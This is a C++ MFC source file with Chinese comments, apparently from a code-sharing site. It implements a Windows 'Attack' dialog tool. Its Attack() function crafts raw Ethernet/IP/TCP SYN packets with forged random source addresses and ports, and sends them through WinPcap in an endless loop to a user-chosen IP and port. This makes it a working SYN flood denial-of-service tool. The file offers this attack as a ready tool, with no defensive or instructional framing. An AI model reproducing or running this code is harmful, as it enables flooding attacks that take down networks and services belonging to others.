📄 attackdlg.cpp
字号:
// AttackDlg.cpp : 实现文件
//
#include "stdafx.h"
#include "Attack.h"
#include "AttackDlg.h"
#include <winsock2.h>
#include <ws2tcpip.h>
#include <pcap.h>
#include <remote-ext.h>
#include <ntddndis.h>
#include <packet32.h>
#include <iphlpapi.h>
#pragma comment(lib,"Iphlpapi.lib")
#pragma comment(lib,"WS2_32.LIB")
#pragma comment(lib,"Packet.LIB")
#pragma comment(lib,"wpcap.LIB")
#ifdef _DEBUG
#define new DEBUG_NEW
#endif
// 用于应用程序“关于”菜单项的 CAboutDlg 对话框
class CAboutDlg : public CDialog
{
public:
CAboutDlg();
// 对话框数据
enum { IDD = IDD_ABOUTBOX };
protected:
virtual void DoDataExchange(CDataExchange* pDX); // DDX/DDV 支持
// 实现
protected:
DECLARE_MESSAGE_MAP()
};
CAboutDlg::CAboutDlg() : CDialog(CAboutDlg::IDD)
{
}
void CAboutDlg::DoDataExchange(CDataExchange* pDX)
{
CDialog::DoDataExchange(pDX);
}
BEGIN_MESSAGE_MAP(CAboutDlg, CDialog)
END_MESSAGE_MAP()
// CAttackDlg 对话框
CAttackDlg::CAttackDlg(CWnd* pParent /*=NULL*/)
: CDialog(CAttackDlg::IDD, pParent)
, m_IpAddress(_T("10.60.57.105"))
, m_Port(80)
{
m_hIcon = AfxGetApp()->LoadIcon(IDR_MAINFRAME);
}
void CAttackDlg::DoDataExchange(CDataExchange* pDX)
{
CDialog::DoDataExchange(pDX);
DDX_Text(pDX, IDC_EDIT1, m_IpAddress);
DDX_Text(pDX, IDC_EDIT2, m_Port);
}
BEGIN_MESSAGE_MAP(CAttackDlg, CDialog)
ON_WM_SYSCOMMAND()
ON_WM_PAINT()
ON_WM_QUERYDRAGICON()
//}}AFX_MSG_MAP
ON_BN_CLICKED(IDC_BUTTON1, &CAttackDlg::OnBnClickedButton1)
END_MESSAGE_MAP()
// CAttackDlg 消息处理程序
BOOL CAttackDlg::OnInitDialog()
{
CDialog::OnInitDialog();
// 将“关于...”菜单项添加到系统菜单中。
// IDM_ABOUTBOX 必须在系统命令范围内。
ASSERT((IDM_ABOUTBOX & 0xFFF0) == IDM_ABOUTBOX);
ASSERT(IDM_ABOUTBOX < 0xF000);
CMenu* pSysMenu = GetSystemMenu(FALSE);
if (pSysMenu != NULL)
{
CString strAboutMenu;
strAboutMenu.LoadString(IDS_ABOUTBOX);
if (!strAboutMenu.IsEmpty())
{
pSysMenu->AppendMenu(MF_SEPARATOR);
pSysMenu->AppendMenu(MF_STRING, IDM_ABOUTBOX, strAboutMenu);
}
}
// 设置此对话框的图标。当应用程序主窗口不是对话框时,框架将自动
// 执行此操作
SetIcon(m_hIcon, TRUE); // 设置大图标
SetIcon(m_hIcon, FALSE); // 设置小图标
// TODO: 在此添加额外的初始化代码
return TRUE; // 除非将焦点设置到控件,否则返回 TRUE
}
void CAttackDlg::OnSysCommand(UINT nID, LPARAM lParam)
{
if ((nID & 0xFFF0) == IDM_ABOUTBOX)
{
CAboutDlg dlgAbout;
dlgAbout.DoModal();
}
else
{
CDialog::OnSysCommand(nID, lParam);
}
}
// 如果向对话框添加最小化按钮,则需要下面的代码
// 来绘制该图标。对于使用文档/视图模型的 MFC 应用程序,
// 这将由框架自动完成。
void CAttackDlg::OnPaint()
{
if (IsIconic())
{
CPaintDC dc(this); // 用于绘制的设备上下文
SendMessage(WM_ICONERASEBKGND, reinterpret_cast<WPARAM>(dc.GetSafeHdc()), 0);
// 使图标在工作矩形中居中
int cxIcon = GetSystemMetrics(SM_CXICON);
int cyIcon = GetSystemMetrics(SM_CYICON);
CRect rect;
GetClientRect(&rect);
int x = (rect.Width() - cxIcon + 1) / 2;
int y = (rect.Height() - cyIcon + 1) / 2;
// 绘制图标
dc.DrawIcon(x, y, m_hIcon);
}
else
{
CDialog::OnPaint();
}
}
//当用户拖动最小化窗口时系统调用此函数取得光标显示。
//
HCURSOR CAttackDlg::OnQueryDragIcon()
{
return static_cast<HCURSOR>(m_hIcon);
}
typedef struct ethdr
{
unsigned char eh_dst[6]; //以太网目的地址
unsigned char eh_src[6]; //以太网源地址
unsigned short eh_type; //
}ETHEADER;
typedef struct tag_ip_Header //ip首部
{
unsigned char h_verlen; //4位手部长度,和4位IP版本号
unsigned char tos; //8位类型服务
unsigned short total_len; //16位总长度
unsigned short ident; //16位标志
unsigned short frag_and_flags; //3位标志位
unsigned char ttl; //8位生存时间
unsigned char proto; //8位协议
unsigned short checksum; //ip手部效验和
unsigned int SourceIP; //伪造IP地址
unsigned int DestIP; //攻击的ip地址
}IPHEADER;
typedef struct tag_tcp_Header
{
USHORT th_sport; //伪造端口
USHORT th_dport; //攻击端口
unsigned int th_seq; //32位系列号
unsigned int th_ack; //32位确认号
unsigned char th_lenres; //4位首部长度,6位保留字
unsigned char th_flag; //6位标志位
USHORT th_win; //16位窗口大小
USHORT th_sum; //16位效验和
USHORT th_urp; //16位紧急指针
}TCPHEADER;
typedef struct tag_tsd_Header
{
unsigned long saddr; //伪造地址
unsigned long daddr; //攻击地址
char mbz; //
char ptcl; //协议类型
unsigned short tcpl; //TCP长度
}TSDHEADER;
//计算效验和
USHORT checksum(USHORT *buffer,int size)
{
unsigned long check=0;
while(size>1)
{
check+=*buffer++;
size -=sizeof(USHORT);
}
if(size)
{
check += *(USHORT*)buffer;
}
check = (check >>16) + (check & 0xffff);
check += (check >>16);
return (USHORT)(~check);
}
void Attack(char* ip,int port)
{
ETHEADER etHeader;
IPHEADER ipHeader;
TCPHEADER tcpHeader;
TSDHEADER psdHeader;
unsigned char SendBuff[2000];
pcap_if_t *alldevs;
char errbuf[PCAP_ERRBUF_SIZE];
pcap_findalldevs(&alldevs,errbuf);
//pcap_if_t *d;
//pcap_t* fp;
//pcap_freealldevs(alldevs);
//for(d=alldevs;d;d=d->next);
//alldevs->addresses->dstaddr->sa_data;
//fp=pcap_open(alldevs->next->next->name,60,PCAP_OPENFLAG_PROMISCUOUS,1000,NULL,NULL);
WCHAR adaptername[8192];
ULONG adapterlength;
LPADAPTER lpAdapter=0;
adapterlength=sizeof(adaptername);
PacketGetAdapterNames(adaptername,&adapterlength);
//lpAdapter=PacketOpenAdapter((char*)adaptername);
lpAdapter=PacketOpenAdapter(alldevs->next->next->name); ////参数中需要找到网卡
LPPACKET pPacket;
//得到本机IP
PHOSTENT hostinfo;
WORD v;
WSADATA wd;
char* localip=new char[16];
char hostname[100];
v=MAKEWORD(2,0);
if(WSAStartup(v,&wd)==0)
{
if( gethostname(hostname,100)==0)
{
hostinfo=gethostbyname(hostname);
localip=inet_ntoa(*(struct in_addr*)*hostinfo->h_addr_list);
}
}
long len = 6;
ULONG srcMac[2];
ULONG destMac[2];
SendARP(inet_addr(localip), NULL, srcMac, (PULONG)&len);
PBYTE pbHexsrcMac = (PBYTE)srcMac;
////////////////////////////////////////
//得到网关IP地址 使用GetAdaptersInfo();
char* gateway;
PIP_ADAPTER_INFO pAdapterInfo;
PIP_ADAPTER_INFO pAdapter = NULL;
DWORD dwRetVal = 0;
pAdapterInfo = (IP_ADAPTER_INFO *) malloc( sizeof(IP_ADAPTER_INFO) );
ULONG ulOutBufLen = sizeof(IP_ADAPTER_INFO);
if (GetAdaptersInfo( pAdapterInfo, &ulOutBufLen) == ERROR_BUFFER_OVERFLOW)
{
free(pAdapterInfo);
pAdapterInfo = (IP_ADAPTER_INFO *) malloc (ulOutBufLen);
}
if ((dwRetVal = GetAdaptersInfo( pAdapterInfo, &ulOutBufLen)) == NO_ERROR)
{
pAdapter = pAdapterInfo;
//localip=pAdapter->IpAddressList.IpAddress.String; //可以得到本地IP地址;
gateway=pAdapter->Next->GatewayList.IpAddress.String; //需要找到网卡
}
SendARP(inet_addr(gateway),NULL, destMac, (PULONG)&len);
PBYTE pbHexdestMac = (PBYTE)destMac;
etHeader.eh_dst[0]=pbHexdestMac[0];
etHeader.eh_dst[1]=pbHexdestMac[1];
etHeader.eh_dst[2]=pbHexdestMac[2];
etHeader.eh_dst[3]=pbHexdestMac[3];
etHeader.eh_dst[4]=pbHexdestMac[4];
etHeader.eh_dst[5]=pbHexdestMac[5];
etHeader.eh_src[0]=pbHexsrcMac[0];
etHeader.eh_src[1]=pbHexsrcMac[1];
etHeader.eh_src[2]=pbHexsrcMac[2];
etHeader.eh_src[3]=pbHexsrcMac[3];
etHeader.eh_src[4]=pbHexsrcMac[4];
etHeader.eh_src[5]=pbHexsrcMac[5];
etHeader.eh_type=htons(0x0800);
//攻击数据包设置
//填充IP首部
ipHeader.h_verlen=(4<<4 | sizeof(ipHeader)/sizeof(unsigned long)); //版本+首部长度
ipHeader.tos=0; //tos服务类型
ipHeader.total_len=htons(sizeof(ipHeader)+sizeof(tcpHeader)); //总长度
ipHeader.ident=256; //标识
ipHeader.frag_and_flags=0;
ipHeader.proto=IPPROTO_TCP; //协议类型
ipHeader.checksum=0; //16位首部检验和
ipHeader.DestIP=inet_addr(ip); //目的地址
//填充TCP首部
tcpHeader.th_dport=htons(port); //目的端口号
tcpHeader.th_seq=htonl(0x1234567); //序列号
tcpHeader.th_ack=0; //确认号
tcpHeader.th_lenres=(sizeof(tcpHeader)/4<<4|0);//首部长度
tcpHeader.th_flag=2; //SYN标识(000010)
tcpHeader.th_win=0; //窗口大小
tcpHeader.th_urp=0; //紧急指针
tcpHeader.th_sum=0; //校验和
//填充PSD首部
psdHeader.daddr=ipHeader.DestIP;
psdHeader.mbz=0;
psdHeader.ptcl=IPPROTO_TCP;
psdHeader.tcpl=htons(sizeof(tcpHeader));
while(true)
{
//数据包动态值设置
ipHeader.ttl=(unsigned char)GetTickCount()%8310+620; //随机TTL值
ipHeader.SourceIP=htonl(GetTickCount()*1983); //伪造随机地址
int SourcePort =GetTickCount()*1983%8310; //得到伪造随机端口
tcpHeader.th_sport=htons(SourcePort); //源端口号
psdHeader.saddr=ipHeader.SourceIP;
//计算IP校验和
memcpy(SendBuff,&ipHeader,sizeof(ipHeader));
ipHeader.checksum=checksum((USHORT *)SendBuff,sizeof(ipHeader));
//计算TCP校验和
memcpy(SendBuff, &psdHeader, sizeof(psdHeader));
memcpy(SendBuff+sizeof(psdHeader), &tcpHeader, sizeof(tcpHeader));
tcpHeader.th_sum=checksum((USHORT *)SendBuff,sizeof(psdHeader)+sizeof(tcpHeader));
//组织包结构
memcpy(SendBuff,&etHeader,sizeof(etHeader));
memcpy(SendBuff+sizeof(etHeader), &ipHeader, sizeof(ipHeader));
memcpy(SendBuff+sizeof(etHeader)+sizeof(ipHeader), &tcpHeader, sizeof(tcpHeader));
//发送包
pPacket = PacketAllocatePacket();
PacketInitPacket(pPacket,SendBuff,sizeof(ipHeader)+sizeof(tcpHeader)+sizeof(etHeader));
if(PacketSetNumWrites(lpAdapter,50000))
{
PacketSendPacket(lpAdapter,pPacket,TRUE);
}
//pcap_sendpacket(fp,SendBuff,sizeof(ipHeader)+sizeof(tcpHeader)+sizeof(etHeader)+1000); //7000包/s
}
PacketFreePacket(pPacket);
PacketCloseAdapter(lpAdapter);
}
void CAttackDlg::OnBnClickedButton1()
{
UpdateData(TRUE);
int length=m_IpAddress.GetLength();
char* ip=new char[length+1];
for(int i=0;i<length;i++)
{
ip[i]=m_IpAddress.GetAt(i);
}
ip[length]='\0';
Attack(ip,m_Port);
delete ip;
}
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -